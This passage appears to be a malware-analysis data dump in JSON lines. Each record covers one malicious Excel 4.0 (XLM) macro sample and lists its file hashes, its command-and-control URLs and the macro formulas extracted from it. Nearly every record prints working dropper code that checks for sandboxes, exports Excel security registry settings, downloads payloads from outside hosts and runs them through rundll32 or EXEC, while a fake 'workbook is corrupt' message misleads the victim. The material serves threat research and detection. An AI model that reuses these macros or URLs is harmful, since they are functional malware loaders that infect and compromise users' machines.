255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TJpCg6ly4v\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3408da495ab4a17b5c970034c266e2a31170c821fd5bdd8887ebed1cf6c7e34e"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"3408da495ab4a17b5c970034c266e2a31170c821fd5bdd8887ebed1cf6c7e34e","filesize":209408,"md5":"c2f9276c168c0ebff4f11be8db07c8cd","sha1":"6e93bfd6e8868567917ff0ad37ee4b599848e148","sha256":"3408da495ab4a17b5c970034c266e2a31170c821fd5bdd8887ebed1cf6c7e34e","sha512":"304f24c8cecebdbfc834dbe0cb70b2768c7d9fd5f1ee5835f83b8de2b2282fbfc9e687f28e51705c29f28b0527723e078b9ba2946f57ec8e648f376f81d979e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3408da495ab4a17b5c970034c266e2a31170c821fd5bdd8887ebed1cf6c7e34e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ifkR1ebQBD\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"340aaaed3f5d86a344130f7e755e75306c023e6fc8e05a628590e4c099d15ac5"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"340aaaed3f5d86a344130f7e755e75306c023e6fc8e05a628590e4c099d15ac5","filesize":209920,"md5":"9ff2cc34e3dda369225cae4c5e1461a4","sha1":"2e64fb3333f6b7f9dc9245654166ab7028976d56","sha256":"340aaaed3f5d86a344130f7e755e75306c023e6fc8e05a628590e4c099d15ac5","sha512":"2120083c46829a19abadd965b0b5c05ba0f1007dfe3a6a691075fd77b45f668c8a78a2e1d8ae5f92e61ce9817e932e535eca022d9179800d0c12059e4d570da1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"340aaaed3f5d86a344130f7e755e75306c023e6fc8e05a628590e4c099d15ac5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CGwfbsmo9z\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3410f3413077e151c2c8cffe0a3259a88eaa358d12fe5b5a86f0f52c7f5c206f"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"3410f3413077e151c2c8cffe0a3259a88eaa358d12fe5b5a86f0f52c7f5c206f","filesize":113664,"md5":"3c66bde5ac466a8ce8816ec8d7954744","sha1":"7cbec58dd4a693c6f8669d59e630cc73fe4c3711","sha256":"3410f3413077e151c2c8cffe0a3259a88eaa358d12fe5b5a86f0f52c7f5c206f","sha512":"ae12bba429ced76a3d96084d9fbe8aed268ec95d61f2185027cd1a56923121ceb4db2a44d1620d41d6cbb79d93eb6c0e234d84d211c6919e44807b2bf2081d85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3410f3413077e151c2c8cffe0a3259a88eaa358d12fe5b5a86f0f52c7f5c206f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4Nw7liRJj7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e","filesize":212992,"md5":"00e65ae2d977bf7be2e2e9cf5b7382ef","sha1":"b1e96f495a618ba3ced4babac401e7ab57e2a394","sha256":"341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e","sha512":"d9da66b12aeffb6f195bccdde0c73a09b9452cbbda1fa8c4ae93b36695fccd7bd7309b51e602fa8dd30c773e5f93413ee140dbe25fe010b0f39449b5d8b621bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"341c8e54b1eb0d4d092825257143d28ebc8ab54587f650f5f4486494955bed7e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jyHQWsnVnj\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"343800c13856c2b20267f7cdce438be10a86a42338687c834c2515636f340f24"},"analysis":{"reported":"2020-04-09T16:15:42Z","score":10},"files":[{"filename":"343800c13856c2b20267f7cdce438be10a86a42338687c834c2515636f340f24","filesize":112128,"md5":"b662fe66e2fdf94ef4c9cd1dc46c7da0","sha1":"6d6fca72097407e3c4a6e7f4a47648c6bd77b8d3","sha256":"343800c13856c2b20267f7cdce438be10a86a42338687c834c2515636f340f24","sha512":"0fbba420f8446d2e183308af86c919e247f45e598838fff36664406effebc84f05c7397114757602cb4e37913108b529e0af6da09168accfb491776a3975c773","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"343800c13856c2b20267f7cdce438be10a86a42338687c834c2515636f340f24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3439f35d3a7966f0de9d49be625f973197cf679d13c1c1a008ddd636e2d35b3d"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"3439f35d3a7966f0de9d49be625f973197cf679d13c1c1a008ddd636e2d35b3d","filesize":113664,"md5":"bfb8c7490b18637de0f3136ee7503dfe","sha1":"9b17116f5ac1d870b7a18f980884646662b5543e","sha256":"3439f35d3a7966f0de9d49be625f973197cf679d13c1c1a008ddd636e2d35b3d","sha512":"247efe0837e047664ad467450ca81e0a083a55fa7412b0ad72d3ce4fe4f409a8039c02c37a3876c5c401cedda02516323be17d199e2c9ba5aeae8d3721c6f71f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3439f35d3a7966f0de9d49be625f973197cf679d13c1c1a008ddd636e2d35b3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"0HEq8KwF8h\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"344257786899b6c76cf093abe80819d3ce70e7d9b46424ffb29f1b8ad54588cb"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"344257786899b6c76cf093abe80819d3ce70e7d9b46424ffb29f1b8ad54588cb","filesize":170496,"md5":"892fdc6afb79e4ad7fb8498c7e216bd0","sha1":"ce60f5ff6b4a2d0def109ad32e4389d3e56a32e4","sha256":"344257786899b6c76cf093abe80819d3ce70e7d9b46424ffb29f1b8ad54588cb","sha512":"4dcb63a0580859ee955f242f1595976ef7ba4da0fbe5290c34432be633bc6b04c0f33f2b32ba9198dbbe2a9789cd68da16bf14fbb1e2a60761e68d682f15db42","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"344257786899b6c76cf093abe80819d3ce70e7d9b46424ffb29f1b8ad54588cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B2S1pzupBf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"34435a0af5d841f1dd1758df1133f0898149ff9775a0ee139c73b4ceb108341f"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"34435a0af5d841f1dd1758df1133f0898149ff9775a0ee139c73b4ceb108341f","filesize":132608,"md5":"96b547c67b4a73712585d7207e6dbf4c","sha1":"b9dbc5436dea1463d9b7a88f2ca8905debee3e6d","sha256":"34435a0af5d841f1dd1758df1133f0898149ff9775a0ee139c73b4ceb108341f","sha512":"118fcab5a81454ea351f68d880a5a93c07259f9999528f5b78f0673e3f1992097ebf432f00a7417092c06e49e4c839ba01a0214b25be2384896b9d74036cf9a9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"34435a0af5d841f1dd1758df1133f0898149ff9775a0ee139c73b4ceb108341f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZsZp8S6M4M\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"344f94edc72a6afe52fe4c9d6c7bd633679401dd0c633d4999d686c2faa3e4e6"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"344f94edc72a6afe52fe4c9d6c7bd633679401dd0c633d4999d686c2faa3e4e6","filesize":113664,"md5":"80e28f24a06e9c917b3cfdf12c86a33b","sha1":"08149503f1e559e6267b93fde80a952708cb9928","sha256":"344f94edc72a6afe52fe4c9d6c7bd633679401dd0c633d4999d686c2faa3e4e6","sha512":"ccb0d96c424ad29efc4bdff5476e74acdc2a135df45014978acf0709d32080672af36457af76b9ca2e01201087c89f97c214cdd4ef7047ddec6e5e0efdefa0d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"344f94edc72a6afe52fe4c9d6c7bd633679401dd0c633d4999d686c2faa3e4e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"ddo9ANXyNq\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"345b8565af7d259fb05b61dd2f4fc26317e6db8a22db3c15f8882e1bfb0b81a9"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"345b8565af7d259fb05b61dd2f4fc26317e6db8a22db3c15f8882e1bfb0b81a9","filesize":185344,"md5":"bb6d693a92505cba30d2de7157854a1c","sha1":"2e43a8de0a05fa44b66ef3a537678169f117c5a8","sha256":"345b8565af7d259fb05b61dd2f4fc26317e6db8a22db3c15f8882e1bfb0b81a9","sha512":"c577de5703dfa8bcf235dc33362a799832f14d5e7fe4bfb87c283e78d8f3aa2e9ed73668734ae7eaaf64e863fbba835258a1671e32b9cdd37903915af2b74a63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"345b8565af7d259fb05b61dd2f4fc26317e6db8a22db3c15f8882e1bfb0b81a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"345d7b53e9b3efc9945d0eb3e7524370228d35c31969e3405faaf3b7c2cf4569"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"345d7b53e9b3efc9945d0eb3e7524370228d35c31969e3405faaf3b7c2cf4569","filesize":160768,"md5":"33511a952da9f9cf5fe65e39e8762c67","sha1":"51603e5cbfaf36a527ab109c1bf824fe3ebd4b3c","sha256":"345d7b53e9b3efc9945d0eb3e7524370228d35c31969e3405faaf3b7c2cf4569","sha512":"71d76b75338714fd692186f6c989ac08604ac15f281043da24275106e96fdd21e0cf281a14f21cc33e40b7d14c2fef80264d0902c60b90cffc5dd28f53872bbc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"345d7b53e9b3efc9945d0eb3e7524370228d35c31969e3405faaf3b7c2cf4569.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GKqQWQqdsV\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"346b7e377d79d46d7ef9453e6974bde4f2571ca516e8904b8deff1a289c6871c"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"346b7e377d79d46d7ef9453e6974bde4f2571ca516e8904b8deff1a289c6871c","filesize":152576,"md5":"f8a79bef7031458afd52494d988bffb6","sha1":"080d156712f8f936cd9ee0e18082365180cd78cd","sha256":"346b7e377d79d46d7ef9453e6974bde4f2571ca516e8904b8deff1a289c6871c","sha512":"fb51326841a5b8d8594cfe62fc328d1210f7ffc8634bbe4b281bad0b4ec23cae54ff8931ac04e466693a76bf12c9c74bbf0cb1766c3f2d353672b4138ea698bb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"346b7e377d79d46d7ef9453e6974bde4f2571ca516e8904b8deff1a289c6871c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"W1VnsFxHoV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"346dbebb99e0d95baa339828ccfbb641a83394d8b7e2743d32b5fd6e072f1c3f"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"346dbebb99e0d95baa339828ccfbb641a83394d8b7e2743d32b5fd6e072f1c3f","filesize":206336,"md5":"77d20dcee3273fbfe956853ca7afc02d","sha1":"5f2c2d1372097753bcaa81249a514999a13bbe79","sha256":"346dbebb99e0d95baa339828ccfbb641a83394d8b7e2743d32b5fd6e072f1c3f","sha512":"d12b96a5fff9ef7d23802ce8d6b58ae7f4cda99a82770fefc53e29f0e3334fbc3183f5f588d60845c5f5541c103b78e180eab43dbb34a209c15daf2c22fda019","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"346dbebb99e0d95baa339828ccfbb641a83394d8b7e2743d32b5fd6e072f1c3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 